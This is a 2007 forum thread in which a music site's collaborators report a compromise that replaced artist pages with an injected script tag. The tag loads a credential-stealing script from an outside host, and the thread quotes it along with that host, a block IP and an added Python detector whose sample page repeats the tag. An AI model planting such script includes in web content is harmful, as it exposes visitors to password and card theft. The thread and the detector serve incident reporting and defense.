
Topic Closed: Anathema: Left overs from the recent hack

Angelo
Special Collaborator
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Posted: December 28 2007 at 08:11

I found this in Report Bugs here:
http://www.progarchives.com/forum/forum_posts.asp?TID=44668

Probably also other bios are affected...




Edited by Angelo - December 28 2007 at 09:42
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]

Angelo
Posted: December 28 2007 at 10:35
Van Der Graaff Generator bio is also damaged and the picture gone....

Atkingani
Special Collaborator
Honorary Collaborator / Retired Admin

Joined: October 21 2005
Location: Terra Brasilis
Status: Offline
Points: 12288
Posted: December 28 2007 at 10:50
I'm afraid the problem could be worse...
Check the ULVER page:
Guigo

~~~~~~

Tuzvihar
Special Collaborator
Honorary Collaborator

Joined: May 18 2005
Location: C. Schinesghe
Status: Offline
Points: 13536
Posted: December 28 2007 at 10:53
My post from the other thread:
Originally posted by Tuzvihar:

There is also lacking a picture for this album.

I couldn't find it...
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski

Atkingani
Posted: December 28 2007 at 10:54
I checked randomly BACAMARTE page and there's a problem there too... and I cannot access properly the entire database right now.
 
Are we under attack?


Edited by Atkingani - December 28 2007 at 10:55

Easy Livin
Special Collaborator
Honorary Collaborator / Retired Admin

Joined: February 21 2004
Location: Scotland
Status: Offline
Points: 15585
Posted: December 28 2007 at 10:58
I think this must be a new bug. I've contacted M@x about it but it looks more prosaic.

chamberry
Special Collaborator
Honorary Collaborator

Joined: October 24 2005
Location: Puerto Rico
Status: Offline
Points: 9008
Posted: December 28 2007 at 11:34
Just found out that John Zorn's band page looks weird too:
http://www.progarchives.com/artist.asp?id=2212



Tuzvihar
Posted: December 28 2007 at 11:36
I randomly checked also Le Orme, Porcupine Tree, Vangelis... It looks like it affected every artist page.

chamberry
Posted: December 28 2007 at 11:39
Also, the streamable MP3s are missing.



Dean
Special Collaborator
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Posted: December 28 2007 at 12:12
Yep, this is a new attack - even the main forum page is taking minutes to load.
 
If there is anything you want me to do just ask, (not that the prospect of rebuilding the bio pages is cheering me up any).
What?

Tuzvihar
Posted: December 28 2007 at 12:32
I went to the Admin Zone and took the option Update artists (it loads very slow!) - it seems all data is gone!!! All I could find there is: <script src=http://c.uc8010.com/0.js></script>.

Edited by Tuzvihar - December 28 2007 at 12:36

Angelo
Posted: December 28 2007 at 12:40
Is M@X aware? Could be useful to temporarily disconnect the server from the web (either physically or through software) to avoid more damage...


Dim
Prog Reviewer

Joined: April 17 2007
Location: Austin TX
Status: Offline
Points: 6890
Posted: December 28 2007 at 12:47
Damn, is there anything we can do?

Angelo
Posted: December 28 2007 at 12:55
^Not a lot I expect.... I sent the contents of the script to Bob, so he can pass it on to M@X.

Dean
Posted: December 28 2007 at 12:56
Run and hide.
 
This one is nasty. It originates from China and is designed to attach itself to your browser for stealing passwords and credit card numbers.

Angelo
Posted: December 28 2007 at 13:16
Where did you find that, Dean?

Thank god we have NoScript, and that on most pages it is inserted in the wrong place (it's being displayed as text rather than executed...)


Edited by Angelo - December 28 2007 at 13:18

Dean
Posted: December 28 2007 at 13:40
My initial thoughts are confirmed - the Forum main page is also affected.
 
The 0.js script from c.uc8010.com is the same script that hit many websites back in November: http://www.websense.com/securitylabs/blog/blog.php?BlogID=160
 
If you see the c.uc8010.com/0.js script address on the page then it has not executed - the scary bit is when you don't see it, because it probably has executed, however apparently anti-virus software is catching it.
 
If you know how, then set your IP blocker to block address 61.188.39.218
 
If you are unprotected, then keep away from the PA until the problem is fixed.
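
The posts above draw two distinctions that can be checked mechanically: a script tag that is visible on the page has not run while one sitting in live markup would, and a stored field may hold only the injected tag (as reported from the Admin Zone) or the tag plus surviving text. The Python sketch below is an added example, not code from the site or from any poster; the allowlist, function names, status labels and sample page are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlparse

# Assumption: only the site's own host may serve scripts to its pages.
ALLOWED_SCRIPT_HOSTS = {"www.progarchives.com"}
# <script ... src=URL>, quoted or not (the tag quoted in the thread has no quotes).
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)[^>]*>(?:\s*</script\s*>)?",
    re.IGNORECASE)
ESCAPED_TAG = re.compile(r"&lt;script\b.*?&gt;", re.IGNORECASE | re.DOTALL)
# Elements whose content a browser renders as text and never runs as markup.
TEXT_ONLY = re.compile(r"<(textarea|title)\b[^>]*>.*?</\1\s*>",
                       re.IGNORECASE | re.DOTALL)
# Constructed sample page: one escaped tag, one first-party script, one live tag.
SAMPLE_PAGE = (
    "<title>Artist</title><p>&lt;script src=http://c.uc8010.com/0.js&gt;"
    '&lt;/script&gt;</p><script src="/js/site.js"></script>'
    "<div>bio</div><script src=http://c.uc8010.com/0.js></script>")

def foreign_srcs(markup):
    """URLs of script tags in markup whose host is not on the allowlist."""
    urls = []
    for m in SCRIPT_TAG.finditer(markup):
        host = urlparse(m.group(1)).hostname  # None for relative paths
        if host and host.lower() not in ALLOWED_SCRIPT_HOSTS:
            urls.append(m.group(1))
    return urls

def classify_page(page):
    """Split foreign script tags into (would_execute, shown_as_text)."""
    shown = []
    for m in ESCAPED_TAG.finditer(page):      # entity-escaped: visible text
        shown += foreign_srcs(html.unescape(m.group(0)))
    for m in TEXT_ONLY.finditer(page):        # inside textarea/title: visible text
        shown += foreign_srcs(m.group(0))
    would_execute = foreign_srcs(TEXT_ONLY.sub("", page))
    return would_execute, shown

def audit_field(value):
    """Classify one stored text field; return (status, cleaned_value)."""
    if not foreign_srcs(value):
        return "clean", value
    cleaned = SCRIPT_TAG.sub(
        lambda m: "" if foreign_srcs(m.group(0)) else m.group(0), value).strip()
    # Nothing left after stripping means the record needs a restore from backup.
    return ("tag_added" if cleaned else "content_lost"), cleaned
```
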

Magic Mountain
Forum Senior Member

Joined: March 21 2006
Location: United States
Status: Offline
Points: 163
Posted: December 28 2007 at 14:49
I have gone to the forum main page and did not see "the c.uc8010.com/0.js script address on the page"  referred to above and my virus software did not catch it.  The main page did not load and had the message "Error on he Page" in the lower left-hand corner of the browser.  Does this mean the script has executed and all of my passwords and credit card information has been transmitted?  What is my next step?

Angelo
Posted: December 28 2007 at 15:24
^ I'll send you a PM

The problem seems to have been resolved, in that the script references are removed and all artist content restored. M@X seems to have taken care of things.

In general: if this script does what it says on the pages Dean referred to, you should be fine if you run an up-to-date virus scanner on your computer. The script apparently tries to install software from the web that captures data like credit card number and passwords the moment they are typed in. Any good virus protection tool should catch those. People who don't have one installed I would advise to install and run one (Avast is a good free solution that has protected me for 5 years now) before submitting online credit card orders or accessing online banking services.

Hope no big damage is done to anyone!


Edited by Angelo - December 28 2007 at 15:34

Atkingani
Posted: December 28 2007 at 15:41
The main database is still off... maybe M@x is recovering it.